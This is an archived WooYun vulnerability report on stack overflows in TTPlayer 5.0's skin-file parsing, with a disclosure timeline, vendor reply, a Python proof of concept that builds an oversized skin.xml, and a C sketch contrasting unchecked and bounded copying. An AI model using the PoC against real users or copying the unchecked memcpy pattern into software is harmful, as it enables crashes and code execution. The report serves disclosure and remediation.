
Vulnerability summary

Defect ID: wooyun-2013-035573

Title: Baidu Music local edition (TTPlayer 5.0) contains stack overflows that allow arbitrary code execution

Vendor: Baidu

Author: 路人甲

Submitted: 2013-08-30 12:07

Fix time: 2013-11-28 12:08

Public disclosure: 2013-11-28 12:08

Vulnerability type: Remote code execution

Severity: High

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-08-30: Details sent to the vendor, awaiting vendor handling
2013-09-01: Vendor confirmed; details disclosed to the vendor only
2013-09-04: Details opened to third-party security partners
2013-10-26: Details opened to core white hats and domain experts
2013-11-05: Details opened to regular white hats
2013-11-15: Details opened to intern white hats
2013-11-28: Details disclosed to the public

Brief description:

Several places in the skin-file handling logic lack length checks, resulting in stack overflows.

Detailed description:

[Image: 1.png]

Proof of concept:

#!/usr/bin/python
# PoC generator: builds Classic.skn (a TTPlayer skin, which is a zip archive)
# whose skin.xml carries oversized image attributes. It expects the unpacked
# stock .\Classic skin directory (supplying the referenced .bmp files) next to
# this script and writes the malicious archive to Z:\Classic.skn.
import os
import zipfile

imagefuzzer = "A" * 4096   # oversized <play image="..."> value: the overflow trigger
imagefuzzer1 = "A"         # one-byte filler for the other fuzzed image attributes

# skin.xml template; the %s slots are, in order: player_window image
# (512 bytes), play image (4096 bytes), then pause/stop/prev/next/mute/open.
skinxmltmp = """<skin version="2" name="fuck" author="fucker" url="http://fucker.com" email="[email protected]" transparent_color="#ff00ff">
<player_window image="%s">
<play position="8, 125, 38, 155" image=" %s" />
<pause position="8, 125, 38, 155" image=" %s" />
<stop position="43, 130, 63, 150" image=" %s" />
<prev position="70, 130, 90, 150" image="%s" />
<next position="95, 130, 115, 150" image="%s" />
<mute position="122, 130, 142, 150" image="%s" />
<open position="130, 3, 149, 22" image="%s" />
<lyric position="158, 3, 177, 22" image="lyric.bmp" />
<equalizer position="180, 3, 199, 22" image="equalizer.bmp" />
<playlist position="202, 3, 221, 22" image="playlist.bmp" />
<minimize position="229, 6, 244, 21" image="minimize.bmp" />
<exit position="245, 6, 260, 21" image="exit.bmp" />
<progress position="18, 106, 248, 117" bar_image="" thumb_image="progress_thumb.bmp" />
<volume position="151, 130, 217, 148" vertical="false" bar_image="" thumb_image="volume_thumb.bmp" fill_image="volume_fill.bmp" />
<visual position="11, 30, 147, 78" />
<icon position="8, 86, 24, 102" />
<info position="28, 88, 258, 100" color="#ffff06" bkgnd="#000000" font="SimSun" font_size="12" />
<led position="204, 32, 254, 45" image="number.bmp" align="right" />
<stereo position="210, 50, 254, 62" color="#00ffff" bkgnd="#212741" font="SimSun" font_size="12" align="right" />
<status position="181, 65, 254, 77" color="#dcdcdc" bkgnd="#212741" font="SimSun" font_size="12" align="right" />
</player_window>
<lyric_window position="268, 0, 536, 165" resize_rect="14, 34, 256, 42" resize_tile="1" image="lyric_skin.bmp">
<title position="0, 8, 55, 21" image="lyric_title.bmp" align="center" />
<close position="245, 6, 260, 21" image="exit.bmp" align="right" />
<lyric position="8, 28, 260, 52" />
</lyric_window>
<equalizer_window position="268, 165, 536, 330" image="equalizer_skin.bmp" eq_interval="2">
<close position="245, 6, 260, 21" image="exit.bmp" align="right" />
<enabled position="12, 33, 31, 52" image="eq_enabled.bmp" />
<profile position="34, 33, 53, 52" image="eq_profile.bmp" />
<reset position="56, 33, 75, 52" image="eq_reset.bmp" />
<balance position="111, 39, 162, 48" thumb_image="eq_balance.bmp" bar_image="" />
<surround position="203, 39, 254, 48" thumb_image="eq_balance.bmp" bar_image="" />
<preamp position="13, 74, 31, 154" thumb_image="eq_thumb.bmp" bar_image="" fill_image="eq_fill.bmp" />
<eqfactor position="59, 74, 77, 154" thumb_image="eq_thumb.bmp" bar_image="" fill_image="eq_fill.bmp" />
</equalizer_window>
<playlist_window position="0, 165, 268, 330" resize_rect="14, 54, 254, 76" resize_tile="1" image="playlist_skin.bmp">
<title position="0, 8, 55, 21" image="playlist_title.bmp" align="center" />
<close position="245, 6, 260, 21" image="exit.bmp" align="right" />
<toolbar position="8, 24, 260, 44" image="playlist_toolbar.bmp" align="top+left"/>
<scrollbar buttons_image="scrollbar_button.bmp" thumb_image="scrollbar_thumb.bmp" bar_image="scrollbar_bar.bmp" thumb_resize_center="8" thumb_resize_tile="1"/>
<playlist position="9, 50, 259, 82"/>
</playlist_window>
</skin>
""" % (imagefuzzer1 * 512, imagefuzzer, imagefuzzer1, imagefuzzer1,
       imagefuzzer1, imagefuzzer1, imagefuzzer1, imagefuzzer1)

skin_dir = ".\\Classic"        # unpacked stock skin, provides the other bitmaps
skn_path = "Z:\\Classic.skn"   # output archive; load it in TTPlayer to trigger the crash

# Overwrite the skin's skin.xml with the fuzzed template.
with open(os.path.join(skin_dir, "skin.xml"), "w") as generatefile:
    generatefile.write(skinxmltmp)

# Pack the whole skin directory into a .skn; chdir first so the archive
# entries are relative to the skin root, as TTPlayer expects.
zf = zipfile.ZipFile(skn_path, "w", zipfile.ZIP_DEFLATED)
os.chdir(skin_dir)
for dp, dn, fn in os.walk("."):
    for f in fn:
        print(os.path.join(dp, f))
        zf.write(os.path.join(dp, f))
zf.close()

Fix:

Check buffer lengths.
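The flaw in the brief description and the fix recommended above come down to a single missing comparison: an attribute value read out of skin.xml is copied into a fixed-size stack buffer without first checking that it fits. The C sketch below is an added illustration and is not TTPlayer's code; the 260-byte buffer (MAX_PATH), the function names and the minimal attribute scanner are assumptions. It places the unchecked copy next to the bounded loader the fix calls for, and feeds the bounded one a <play> element shaped like the PoC's 4096-byte image value.

```c
/* Added illustration, not TTPlayer's code: a skin.xml image attribute
 * copied into a fixed stack buffer without a length check, and the
 * bounded loader the fix calls for. IMAGE_PATH_MAX (MAX_PATH) and the
 * function names are assumptions. */
#include <stdio.h>
#include <string.h>

#define IMAGE_PATH_MAX 260   /* assumed MAX_PATH-sized stack buffer */

/* Locate attr="..." inside one element string. Returns a pointer to the
 * first value byte and stores the value length in *len, or NULL if the
 * attribute is absent or its closing quote is missing. The leading space
 * in the needle keeps "image" from matching "thumb_image" or "bar_image". */
static const char *find_attr(const char *element, const char *attr, size_t *len)
{
    char needle[64];
    const char *start, *end;

    if (snprintf(needle, sizeof needle, " %s=\"", attr) >= (int)sizeof needle)
        return NULL;
    start = strstr(element, needle);
    if (start == NULL)
        return NULL;
    start += strlen(needle);
    end = strchr(start, '"');
    if (end == NULL)
        return NULL;
    *len = (size_t)(end - start);
    return start;
}

/* Vulnerable pattern: the value is copied with no bound, so the PoC's
 * 4096-byte image="AAAA..." overruns the 260-byte stack buffer and the
 * saved return address behind it. Kept for contrast only; never call it
 * on untrusted input. */
int load_image_attr_unsafe(const char *element)
{
    char image[IMAGE_PATH_MAX];
    size_t len;
    const char *val = find_attr(element, "image", &len);

    if (val == NULL)
        return -1;
    memcpy(image, val, len);          /* no check of len against sizeof image */
    image[len] = '\0';
    return (int)strlen(image);
}

/* Fixed pattern: reject anything that does not fit, then copy.
 * Returns the value length, -1 if the attribute is missing, -2 if too long. */
int load_image_attr_safe(const char *element, char *out, size_t out_size)
{
    size_t len;
    const char *val = find_attr(element, "image", &len);

    if (val == NULL)
        return -1;
    if (len >= out_size)              /* the length check the PoC shows is missing */
        return -2;
    memcpy(out, val, len);
    out[len] = '\0';
    return (int)len;
}

/* Convenience wrapper: load through a MAX_PATH-sized local buffer. */
int safe_load_len(const char *element)
{
    char image[IMAGE_PATH_MAX];
    return load_image_attr_safe(element, image, sizeof image);
}

/* Build a <play> element whose image value is n 'A' bytes, the shape the
 * PoC's skin.xml uses, and run it through the fixed loader. */
int safe_load_fuzz_len(size_t n)
{
    static char element[8192];
    const char *head = "<play position=\"8, 125, 38, 155\" image=\"";
    const char *tail = "\" />";
    size_t pos = 0;

    if (strlen(head) + n + strlen(tail) + 1 > sizeof element)
        return -3;
    memcpy(element, head, strlen(head));
    pos += strlen(head);
    memset(element + pos, 'A', n);
    pos += n;
    memcpy(element + pos, tail, strlen(tail) + 1);   /* copies the NUL too */
    return safe_load_len(element);
}

int main(void)
{
    /* constructed inputs: a stock button line and one without an image attribute */
    const char *normal = "<play position=\"8, 125, 38, 155\" image=\"play.bmp\" />";
    const char *no_image = "<visual position=\"11, 30, 147, 78\" />";

    printf("play.bmp        -> %d\n", safe_load_len(normal));
    printf("no attribute    -> %d\n", safe_load_len(no_image));
    printf("4096 x 'A'      -> %d\n", safe_load_fuzz_len(4096));
    printf("unsafe loader on play.bmp -> %d\n", load_image_attr_unsafe(normal));
    return 0;
}
```

Compiled with gcc or MSVC and run as is, the bounded loader accepts play.bmp, reports a missing attribute for the visual element, and refuses the 4096-byte value with -2 instead of overwriting the stack. The check has to compare against the destination size (strictly less, to leave room for the terminator) at every site that copies an attribute, since the report says the length check is absent in several places.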

Copyright notice: when reposting, credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2013-09-01 10:10

Vendor reply:

Thanks for the submission; we are handling it. "Baidu, safer because of you."

Latest status:

None